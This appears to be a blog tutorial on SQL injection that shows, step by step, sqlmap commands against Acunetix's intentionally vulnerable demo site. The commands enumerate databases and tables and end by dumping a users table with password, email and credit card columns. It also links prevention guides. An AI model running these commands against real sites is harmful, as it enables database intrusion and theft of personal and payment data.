What is SQL Injection?

If you are new to SQL Injection, visit this simple and good text SQL Injection Attack explained, with example.

What is post about?

I am not advocating that you start using SQL injection to start stealing other people or companies data. However, I do think that you should know the various SQL injection techniques so that you will be better prepared to prevent them from happening in your own web application.

How to begin

The first step in preventing this attack is to establish which (if any) of your applications are vulnerable. The best way to do this is to launch your own attacks to see whether they are successful. But SQL is a complex language, so it is not a trivial task to construct code snippets that can be injected into a query to attempt to compromise a database.

The good news is that this is not necessary because all we need to do is run an automated SQL injection attack tool to do the work.

An example is Sqlmap (explained below), a open-source tool and one the most powerful for automated SQL injection, it has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, among others.

Point it at a potential target and Sqlmap probes the site to determine what type of database is in use. Using that knowledge, this tool then builds queries to probe characteristics of the database. Requiring little to no SQL expertise from the end user, Sqlmap can potentially extract fields, tables, and sometimes even full data dumps from a target.

How to prevent SQL Injection Attacks

We must works and evolve existing tools and processes (we do not need reinvent the wheel!).

The Best collection of advice and best practices about this topic is at bobby-tables.com and OWASP Cheat Sheet Series.

Using Sqlmap 1.3 (2019 released version) to exploit SQL injection - Step by Step Explained

To show how it works, we will use an already vulnerable system developed by Acunetix, the site http://testphp.vulnweb.com.

To understand this tutorial you should have some knowledge of how database driven web applications work and how find a vulnerable urls.

Installing

First, we have to install python on our system.

We can download Sqlmap by cloning the Git repository using the command:



git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Getting started

Let us try to confirm the vulnerability by simply adding a single quote at the end of the URL:

The above URL shows an error on the web page, saying "Error in your SQL Syntax". This is because of an extra single quote (') that we have entered through the URL into the query in the background. So by seeing the error we can understand that the URL is vulnerable to In-band SQL Injection.

Step 1

In this test we will use a standard HTTP GET based request against a URI with a parameter (?cat=1). This will test different SQL injection methods against the cat parameter.



python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1"

In the results, we can see the DBMS of server and the methods used to exploit.

Step 2

Once Sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable, use --dbs to discovery all databases.



python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -dbs

Step 3

Now, we can find out what tables exist in a particular database. Let is use the database acuart.



python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs -D acuart --tables

Step 4

Now that we have the list of tables with us, it would be a get the columns of some important table. For example: users.



python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs -D acuart --tables -T users --columns

Step 5

And finally, we can extract the data from the table.

The below command will simply dump (csv) the data of the particular table.



python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs -D acuart -T users -C name,pass,uname,email,address,cc --dump

Conclusion

Sqlmap is a very powerful tool and highly customizable, I recommend read the Usage Guide to explore all features. We must not forget to explore others HTTP methods (POST, PUT, DELETE, etc.).

Resources

http://sqlmap.org/

https://www.esecurityplanet.com/threats/how-to-prevent-sql-injection-attacks.html